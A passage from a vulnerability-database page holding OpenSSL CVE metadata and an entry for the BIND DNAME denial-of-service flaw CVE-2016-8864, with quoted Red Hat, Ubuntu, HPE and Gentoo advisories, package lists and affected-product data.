        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:0494"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-24122"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13943"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-17527"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-13943"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-17527"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-24122"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/openssl1.0/1.0.2n-1ubuntu5.5"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/openssl/1.1.1f-1ubuntu2.1"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4662-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/openssl/1.1.1-1ubuntu2.1~18.04.7"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.2g-1ubuntu4.18"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/openssl/1.1.1f-1ubuntu4.1"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-173115"
      },
      {
        "db": "PACKETSTORM",
        "id": "160654"
      },
      {
        "db": "PACKETSTORM",
        "id": "160605"
      },
      {
        "db": "PACKETSTORM",
        "id": "161546"
      },
      {
        "db": "PACKETSTORM",
        "id": "161727"
      },
      {
        "db": "PACKETSTORM",
        "id": "160882"
      },
      {
        "db": "PACKETSTORM",
        "id": "161548"
      },
      {
        "db": "PACKETSTORM",
        "id": "162130"
      },
      {
        "db": "PACKETSTORM",
        "id": "161389"
      },
      {
        "db": "PACKETSTORM",
        "id": "160414"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-579"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-1971"
      }
    ]
  },
  "sources": {
    "_id": null,
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-173115",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "160654",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "160605",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "161546",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "161727",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "160882",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "161548",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "162130",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "161389",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "160414",
        "ident": null
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-579",
        "ident": null
      },
      {
        "db": "NVD",
        "id": "CVE-2020-1971",
        "ident": null
      }
    ]
  },
  "sources_release_date": {
    "_id": null,
    "data": [
      {
        "date": "2020-12-08T00:00:00",
        "db": "VULHUB",
        "id": "VHN-173115",
        "ident": null
      },
      {
        "date": "2020-12-21T20:24:33",
        "db": "PACKETSTORM",
        "id": "160654",
        "ident": null
      },
      {
        "date": "2020-12-17T18:21:28",
        "db": "PACKETSTORM",
        "id": "160605",
        "ident": null
      },
      {
        "date": "2021-02-25T15:29:25",
        "db": "PACKETSTORM",
        "id": "161546",
        "ident": null
      },
      {
        "date": "2021-03-09T16:25:11",
        "db": "PACKETSTORM",
        "id": "161727",
        "ident": null
      },
      {
        "date": "2021-01-11T16:20:53",
        "db": "PACKETSTORM",
        "id": "160882",
        "ident": null
      },
      {
        "date": "2021-02-25T15:30:03",
        "db": "PACKETSTORM",
        "id": "161548",
        "ident": null
      },
      {
        "date": "2021-04-08T14:00:00",
        "db": "PACKETSTORM",
        "id": "162130",
        "ident": null
      },
      {
        "date": "2021-02-11T15:25:54",
        "db": "PACKETSTORM",
        "id": "161389",
        "ident": null
      },
      {
        "date": "2020-12-09T16:09:14",
        "db": "PACKETSTORM",
        "id": "160414",
        "ident": null
      },
      {
        "date": "2020-12-08T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202012-579",
        "ident": null
      },
      {
        "date": "2020-12-08T16:15:11.730000",
        "db": "NVD",
        "id": "CVE-2020-1971",
        "ident": null
      }
    ]
  },
  "sources_update_date": {
    "_id": null,
    "data": [
      {
        "date": "2022-08-29T00:00:00",
        "db": "VULHUB",
        "id": "VHN-173115",
        "ident": null
      },
      {
        "date": "2022-07-21T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202012-579",
        "ident": null
      },
      {
        "date": "2024-11-21T05:11:45.673000",
        "db": "NVD",
        "id": "CVE-2020-1971",
        "ident": null
      }
    ]
  },
  "threat_type": {
    "_id": null,
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "160414"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-579"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "_id": null,
    "data": "OpenSSL Code problem vulnerability",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-579"
      }
    ],
    "trust": 0.6
  },
  "type": {
    "_id": null,
    "data": "code problem",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-579"
      }
    ],
    "trust": 0.6
  }
}

VAR-201611-0348

Vulnerability from variot - Updated: 2026-04-10 22:30

named in ISC BIND 9.x before 9.9.9-P4, 9.10.x before 9.10.4-P4, and 9.11.x before 9.11.0-P1 allows remote attackers to cause a denial of service (assertion failure and daemon exit) via a DNAME record in the answer section of a response to a recursive query, related to db.c and resolver.c. ISC BIND Is DNAME There is a problem with the response packet containing the record, db.c Or resolver.c so assertion failture ( Violation of representation ) And the result named May end abnormally. (resolver.c so assertion failure If this happens "INSIST((valoptions & 0x0002U) != 0) failed" , db.c so assertion failure If this happens "REQUIRE(targetp != ((void )0) && targetp == ((void *)0)) failed" Is displayed. ) According to the developer, 2016 Year 11 Moon 2 No attacks have been observed as of the day, but queries that cause crashes are mentioned on the public mailing list. Supplementary information : CWE Vulnerability type by CWE-19: Data Handling ( Data processing ) Has been identified. https://cwe.mitre.org/data/definitions/19.htmlService disruption by a remote third party (DoS) An attack may be carried out. ISC BIND is prone to a remote denial-of-service vulnerability. Attackers can exploit this issue to crash the application, resulting in a denial-of-service condition. ISC BIND versions 9.0.x through 9.8.x, 9.9.0 through 9.9.9-P3, 9.9.3-S1 through 9.9.9-S5, 9.10.0 through 9.10.4-P3 and 9.11.0 are vulnerable. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

===================================================================== Red Hat Security Advisory

Synopsis: Important: bind security update Advisory ID: RHSA-2016:2871-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2016-2871.html Issue date: 2016-12-06 CVE Names: CVE-2016-8864 =====================================================================

Summary:

An update for bind is now available for Red Hat Enterprise Linux 6.2 Advanced Update Support, Red Hat Enterprise Linux 6.4 Advanced Update Support, Red Hat Enterprise Linux 6.5 Advanced Update Support, Red Hat Enterprise Linux 6.5 Telco Extended Update Support, Red Hat Enterprise Linux 6.6 Advanced Update Support, Red Hat Enterprise Linux 6.6 Telco Extended Update Support, and Red Hat Enterprise Linux 6.7 Extended Update Support.

Relevant releases/architectures:

Red Hat Enterprise Linux HPC Node EUS (v. 6.7) - x86_64 Red Hat Enterprise Linux HPC Node Optional EUS (v. 6.7) - x86_64 Red Hat Enterprise Linux Server AUS (v. 6.2) - x86_64 Red Hat Enterprise Linux Server AUS (v. 6.4) - x86_64 Red Hat Enterprise Linux Server AUS (v. 6.5) - x86_64 Red Hat Enterprise Linux Server AUS (v. 6.6) - x86_64 Red Hat Enterprise Linux Server EUS (v. 6.7) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional AUS (v. 6.2) - x86_64 Red Hat Enterprise Linux Server Optional AUS (v. 6.4) - x86_64 Red Hat Enterprise Linux Server Optional AUS (v. 6.5) - x86_64 Red Hat Enterprise Linux Server Optional AUS (v. 6.6) - x86_64 Red Hat Enterprise Linux Server Optional EUS (v. 6.7) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional TUS (v. 6.5) - x86_64 Red Hat Enterprise Linux Server Optional TUS (v. 6.6) - x86_64 Red Hat Enterprise Linux Server TUS (v. 6.5) - x86_64 Red Hat Enterprise Linux Server TUS (v. 6.6) - x86_64

Description:

The Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.

Security Fix(es):

A denial of service flaw was found in the way BIND handled responses containing a DNAME answer. (CVE-2016-8864)

Red Hat would like to thank ISC for reporting this issue. Upstream acknowledges Tony Finch (University of Cambridge) and Marco Davids (SIDN Labs) as the original reporters.

Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, the BIND daemon (named) will be restarted automatically.

Bugs fixed (https://bugzilla.redhat.com/):

1389652 - CVE-2016-8864 bind: assertion failure while handling responses containing a DNAME answer

Package List:

Red Hat Enterprise Linux HPC Node EUS (v. 6.7):

Source: bind-9.8.2-0.37.rc1.el6_7.9.src.rpm

x86_64: bind-debuginfo-9.8.2-0.37.rc1.el6_7.9.i686.rpm bind-debuginfo-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm bind-libs-9.8.2-0.37.rc1.el6_7.9.i686.rpm bind-libs-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm bind-utils-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm

Red Hat Enterprise Linux HPC Node Optional EUS (v. 6.7):

x86_64: bind-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm bind-chroot-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm bind-debuginfo-9.8.2-0.37.rc1.el6_7.9.i686.rpm bind-debuginfo-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm bind-devel-9.8.2-0.37.rc1.el6_7.9.i686.rpm bind-devel-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm bind-sdb-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm

Red Hat Enterprise Linux Server AUS (v. 6.2):

Source: bind-9.7.3-8.P3.el6_2.6.src.rpm

x86_64: bind-9.7.3-8.P3.el6_2.6.x86_64.rpm bind-chroot-9.7.3-8.P3.el6_2.6.x86_64.rpm bind-debuginfo-9.7.3-8.P3.el6_2.6.i686.rpm bind-debuginfo-9.7.3-8.P3.el6_2.6.x86_64.rpm bind-libs-9.7.3-8.P3.el6_2.6.i686.rpm bind-libs-9.7.3-8.P3.el6_2.6.x86_64.rpm bind-utils-9.7.3-8.P3.el6_2.6.x86_64.rpm

Red Hat Enterprise Linux Server AUS (v. 6.4):

Source: bind-9.8.2-0.17.rc1.el6_4.10.src.rpm

x86_64: bind-9.8.2-0.17.rc1.el6_4.10.x86_64.rpm bind-chroot-9.8.2-0.17.rc1.el6_4.10.x86_64.rpm bind-debuginfo-9.8.2-0.17.rc1.el6_4.10.i686.rpm bind-debuginfo-9.8.2-0.17.rc1.el6_4.10.x86_64.rpm bind-libs-9.8.2-0.17.rc1.el6_4.10.i686.rpm bind-libs-9.8.2-0.17.rc1.el6_4.10.x86_64.rpm bind-utils-9.8.2-0.17.rc1.el6_4.10.x86_64.rpm

Red Hat Enterprise Linux Server AUS (v. 6.5):

Source: bind-9.8.2-0.23.rc1.el6_5.5.src.rpm

x86_64: bind-9.8.2-0.23.rc1.el6_5.5.x86_64.rpm bind-chroot-9.8.2-0.23.rc1.el6_5.5.x86_64.rpm bind-debuginfo-9.8.2-0.23.rc1.el6_5.5.i686.rpm bind-debuginfo-9.8.2-0.23.rc1.el6_5.5.x86_64.rpm bind-libs-9.8.2-0.23.rc1.el6_5.5.i686.rpm bind-libs-9.8.2-0.23.rc1.el6_5.5.x86_64.rpm bind-utils-9.8.2-0.23.rc1.el6_5.5.x86_64.rpm

Red Hat Enterprise Linux Server TUS (v. 6.5):

Source: bind-9.8.2-0.23.rc1.el6_5.5.src.rpm

Red Hat Enterprise Linux Server AUS (v. 6.6):

Source: bind-9.8.2-0.30.rc1.el6_6.7.src.rpm

x86_64: bind-9.8.2-0.30.rc1.el6_6.7.x86_64.rpm bind-chroot-9.8.2-0.30.rc1.el6_6.7.x86_64.rpm bind-debuginfo-9.8.2-0.30.rc1.el6_6.7.i686.rpm bind-debuginfo-9.8.2-0.30.rc1.el6_6.7.x86_64.rpm bind-libs-9.8.2-0.30.rc1.el6_6.7.i686.rpm bind-libs-9.8.2-0.30.rc1.el6_6.7.x86_64.rpm bind-utils-9.8.2-0.30.rc1.el6_6.7.x86_64.rpm

Red Hat Enterprise Linux Server TUS (v. 6.6):

Source: bind-9.8.2-0.30.rc1.el6_6.7.src.rpm

Red Hat Enterprise Linux Server EUS (v. 6.7):

Source: bind-9.8.2-0.37.rc1.el6_7.9.src.rpm

i386: bind-9.8.2-0.37.rc1.el6_7.9.i686.rpm bind-chroot-9.8.2-0.37.rc1.el6_7.9.i686.rpm bind-debuginfo-9.8.2-0.37.rc1.el6_7.9.i686.rpm bind-libs-9.8.2-0.37.rc1.el6_7.9.i686.rpm bind-utils-9.8.2-0.37.rc1.el6_7.9.i686.rpm

ppc64: bind-9.8.2-0.37.rc1.el6_7.9.ppc64.rpm bind-chroot-9.8.2-0.37.rc1.el6_7.9.ppc64.rpm bind-debuginfo-9.8.2-0.37.rc1.el6_7.9.ppc.rpm bind-debuginfo-9.8.2-0.37.rc1.el6_7.9.ppc64.rpm bind-libs-9.8.2-0.37.rc1.el6_7.9.ppc.rpm bind-libs-9.8.2-0.37.rc1.el6_7.9.ppc64.rpm bind-utils-9.8.2-0.37.rc1.el6_7.9.ppc64.rpm

s390x: bind-9.8.2-0.37.rc1.el6_7.9.s390x.rpm bind-chroot-9.8.2-0.37.rc1.el6_7.9.s390x.rpm bind-debuginfo-9.8.2-0.37.rc1.el6_7.9.s390.rpm bind-debuginfo-9.8.2-0.37.rc1.el6_7.9.s390x.rpm bind-libs-9.8.2-0.37.rc1.el6_7.9.s390.rpm bind-libs-9.8.2-0.37.rc1.el6_7.9.s390x.rpm bind-utils-9.8.2-0.37.rc1.el6_7.9.s390x.rpm

x86_64: bind-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm bind-chroot-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm bind-debuginfo-9.8.2-0.37.rc1.el6_7.9.i686.rpm bind-debuginfo-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm bind-libs-9.8.2-0.37.rc1.el6_7.9.i686.rpm bind-libs-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm bind-utils-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm

Red Hat Enterprise Linux Server Optional AUS (v. 6.2):

Source: bind-9.7.3-8.P3.el6_2.6.src.rpm

x86_64: bind-debuginfo-9.7.3-8.P3.el6_2.6.i686.rpm bind-debuginfo-9.7.3-8.P3.el6_2.6.x86_64.rpm bind-devel-9.7.3-8.P3.el6_2.6.i686.rpm bind-devel-9.7.3-8.P3.el6_2.6.x86_64.rpm bind-sdb-9.7.3-8.P3.el6_2.6.x86_64.rpm

Red Hat Enterprise Linux Server Optional AUS (v. 6.4):

Source: bind-9.8.2-0.17.rc1.el6_4.10.src.rpm

x86_64: bind-debuginfo-9.8.2-0.17.rc1.el6_4.10.i686.rpm bind-debuginfo-9.8.2-0.17.rc1.el6_4.10.x86_64.rpm bind-devel-9.8.2-0.17.rc1.el6_4.10.i686.rpm bind-devel-9.8.2-0.17.rc1.el6_4.10.x86_64.rpm bind-sdb-9.8.2-0.17.rc1.el6_4.10.x86_64.rpm

Red Hat Enterprise Linux Server Optional AUS (v. 6.5):

Source: bind-9.8.2-0.23.rc1.el6_5.5.src.rpm

x86_64: bind-debuginfo-9.8.2-0.23.rc1.el6_5.5.i686.rpm bind-debuginfo-9.8.2-0.23.rc1.el6_5.5.x86_64.rpm bind-devel-9.8.2-0.23.rc1.el6_5.5.i686.rpm bind-devel-9.8.2-0.23.rc1.el6_5.5.x86_64.rpm bind-sdb-9.8.2-0.23.rc1.el6_5.5.x86_64.rpm

Red Hat Enterprise Linux Server Optional TUS (v. 6.5):

Source: bind-9.8.2-0.23.rc1.el6_5.5.src.rpm

Red Hat Enterprise Linux Server Optional AUS (v. 6.6):

x86_64: bind-debuginfo-9.8.2-0.30.rc1.el6_6.7.i686.rpm bind-debuginfo-9.8.2-0.30.rc1.el6_6.7.x86_64.rpm bind-devel-9.8.2-0.30.rc1.el6_6.7.i686.rpm bind-devel-9.8.2-0.30.rc1.el6_6.7.x86_64.rpm bind-sdb-9.8.2-0.30.rc1.el6_6.7.x86_64.rpm

Red Hat Enterprise Linux Server Optional TUS (v. 6.6):

Red Hat Enterprise Linux Server Optional EUS (v. 6.7):

i386: bind-debuginfo-9.8.2-0.37.rc1.el6_7.9.i686.rpm bind-devel-9.8.2-0.37.rc1.el6_7.9.i686.rpm bind-sdb-9.8.2-0.37.rc1.el6_7.9.i686.rpm

ppc64: bind-debuginfo-9.8.2-0.37.rc1.el6_7.9.ppc.rpm bind-debuginfo-9.8.2-0.37.rc1.el6_7.9.ppc64.rpm bind-devel-9.8.2-0.37.rc1.el6_7.9.ppc.rpm bind-devel-9.8.2-0.37.rc1.el6_7.9.ppc64.rpm bind-sdb-9.8.2-0.37.rc1.el6_7.9.ppc64.rpm

s390x: bind-debuginfo-9.8.2-0.37.rc1.el6_7.9.s390.rpm bind-debuginfo-9.8.2-0.37.rc1.el6_7.9.s390x.rpm bind-devel-9.8.2-0.37.rc1.el6_7.9.s390.rpm bind-devel-9.8.2-0.37.rc1.el6_7.9.s390x.rpm bind-sdb-9.8.2-0.37.rc1.el6_7.9.s390x.rpm

x86_64: bind-debuginfo-9.8.2-0.37.rc1.el6_7.9.i686.rpm bind-debuginfo-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm bind-devel-9.8.2-0.37.rc1.el6_7.9.i686.rpm bind-devel-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm bind-sdb-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

References:

https://access.redhat.com/security/cve/CVE-2016-8864 https://access.redhat.com/security/updates/classification/#important https://kb.isc.org/article/AA-01434

Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

iD8DBQFYRlsfXlSAg2UNWIIRAmy8AJ9xFyJSMmX2XN+lcWzsNNQT7cfR8QCggVOj KpG5DRbXaKAdrUMg5IeIS+s= =aWJX -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . =========================================================================== Ubuntu Security Notice USN-3119-1 November 01, 2016

bind9 vulnerability

A security issue affects these releases of Ubuntu and its derivatives:

Ubuntu 16.10
Ubuntu 16.04 LTS
Ubuntu 14.04 LTS
Ubuntu 12.04 LTS

Summary:

Bind could be made to crash if it received specially crafted network traffic.

Software Description: - bind9: Internet Domain Name Server

Details:

Tony Finch and Marco Davids discovered that Bind incorrectly handled certain responses containing a DNAME answer.

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 16.10: bind9 1:9.10.3.dfsg.P4-10.1ubuntu1.1

Ubuntu 16.04 LTS: bind9 1:9.10.3.dfsg.P4-8ubuntu1.2

Ubuntu 14.04 LTS: bind9 1:9.9.5.dfsg-3ubuntu0.10

Ubuntu 12.04 LTS: bind9 1:9.8.1.dfsg.P1-4ubuntu0.19

In general, a standard system update will make all the necessary changes.

Bug Fix(es):

ICANN is planning to perform a Root Zone DNSSEC Key Signing Key (KSK) rollover during October 2017. Maintaining an up-to-date KSK is essential for ensuring that validating DNS resolvers continue to function following the rollover. (BZ#1459648)

Release Date: 2017-01-27 Last Updated: 2017-01-27

Potential Security Impact: Remote: Denial of Service (DoS)

Source: Hewlett Packard Enterprise, Product Security Response Team

VULNERABILITY SUMMARY Potential security vulnerabilities have been identified in the HP-UX BIND service running named. These vulnerabilities could be exploited remotely to create multiple Denial of Services (DoS).

HP-UX BIND B.11.31 - BIND 9.9.4 prior to C.9.9.4.9.0

BACKGROUND

CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector

CVE-2016-8864
  7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
  5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

CVE-2016-9131
  7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
  5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

CVE-2016-9444
  7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
  5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:

https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499

RESOLUTION

HPE has provided the following software updates to resolve the vulnerability in the HP-UX BIND service running named.

BIND 9.9.4 for HP-UX Release B.11.31 (PA and IA)
Depot: HP_UX_11.31_HPUX-NameServer_C.9.9.4.9.0_HP-UX_B.11.31_IA_PA.depot

Note: The depot files can be found here: https://h20392.www2.hpe.com/portal/swdepot/displayProductInfo.do?productNumb r=BIND

MANUAL ACTIONS: Yes - Update 
Download and install the software update

PRODUCT SPECIFIC INFORMATION 
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application 
that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins 
issued by HPE and lists recommended actions that may apply to a specific HP-UX 
system. It can also download patches and create a depot automatically.

For more information see:

https://h20392.www2.hpe.com/portal/swdepot/displayProductInfo.do?productNumb r=B6834AA The following text is for use by the HP-UX Software Assistant.

AFFECTED VERSIONS

HP-UX B.11.31 IA/PA 
=================== 
NameService.BIND-AUX 
NameService.BIND-RUN 
action: install C.9.9.4.9.0 or subsequent

HISTORY Version:1 (rev.1) - 28 January 2017 Initial release

Report: To report a potential security vulnerability for any HPE supported product: Web form: https://www.hpe.com/info/report-security-vulnerability Email: security-alert@hpe.com

Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice

Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive

Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.

Workaround

There is no known workaround at this time.

Resolution

All BIND users should upgrade to the latest version:

# emerge --sync # emerge --ask --oneshot --verbose ">=net-dns/bind-9.10.4_p4"

References

[ 1 ] CVE-2016-8864 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-8864

Availability

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

https://security.gentoo.org/glsa/201701-26

Concerns?

License

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

. 6) - i386, x86_64

Show details on source website

JSON

To clipboard

{
  "affected_products": {
    "_id": null,
    "data": [
      {
        "_id": null,
        "model": "bind",
        "scope": "eq",
        "trust": 1.8,
        "vendor": "isc",
        "version": "9.11.0"
      },
      {
        "_id": null,
        "model": "solidfire",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "bind",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "isc",
        "version": "9.9.9"
      },
      {
        "_id": null,
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.6"
      },
      {
        "_id": null,
        "model": "bind",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "isc",
        "version": "9.10.4"
      },
      {
        "_id": null,
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.6"
      },
      {
        "_id": null,
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.6"
      },
      {
        "_id": null,
        "model": "bind",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "isc",
        "version": "9.10.4"
      },
      {
        "_id": null,
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.6"
      },
      {
        "_id": null,
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.4"
      },
      {
        "_id": null,
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.6"
      },
      {
        "_id": null,
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "_id": null,
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.4"
      },
      {
        "_id": null,
        "model": "data ontap edge",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "_id": null,
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "8.0"
      },
      {
        "_id": null,
        "model": "bind",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "isc",
        "version": "9.0.0"
      },
      {
        "_id": null,
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.7"
      },
      {
        "_id": null,
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.5"
      },
      {
        "_id": null,
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "_id": null,
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.3"
      },
      {
        "_id": null,
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "5.0"
      },
      {
        "_id": null,
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.3"
      },
      {
        "_id": null,
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.2"
      },
      {
        "_id": null,
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "_id": null,
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.5"
      },
      {
        "_id": null,
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.3"
      },
      {
        "_id": null,
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "5.0"
      },
      {
        "_id": null,
        "model": "bind",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "isc",
        "version": "9.10.0"
      },
      {
        "_id": null,
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "_id": null,
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.7"
      },
      {
        "_id": null,
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.4"
      },
      {
        "_id": null,
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.2"
      },
      {
        "_id": null,
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.5"
      },
      {
        "_id": null,
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.2"
      },
      {
        "_id": null,
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.7"
      },
      {
        "_id": null,
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.7"
      },
      {
        "_id": null,
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "_id": null,
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.2"
      },
      {
        "_id": null,
        "model": "bind",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "isc",
        "version": "9.9.9"
      },
      {
        "_id": null,
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "5.0"
      },
      {
        "_id": null,
        "model": "steelstore cloud integrated storage",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "bind",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "isc",
        "version": "9.0.1"
      },
      {
        "_id": null,
        "model": "bind",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "isc",
        "version": "9.0"
      },
      {
        "_id": null,
        "model": "bind",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "isc",
        "version": "9.0.x from  9.8.x"
      },
      {
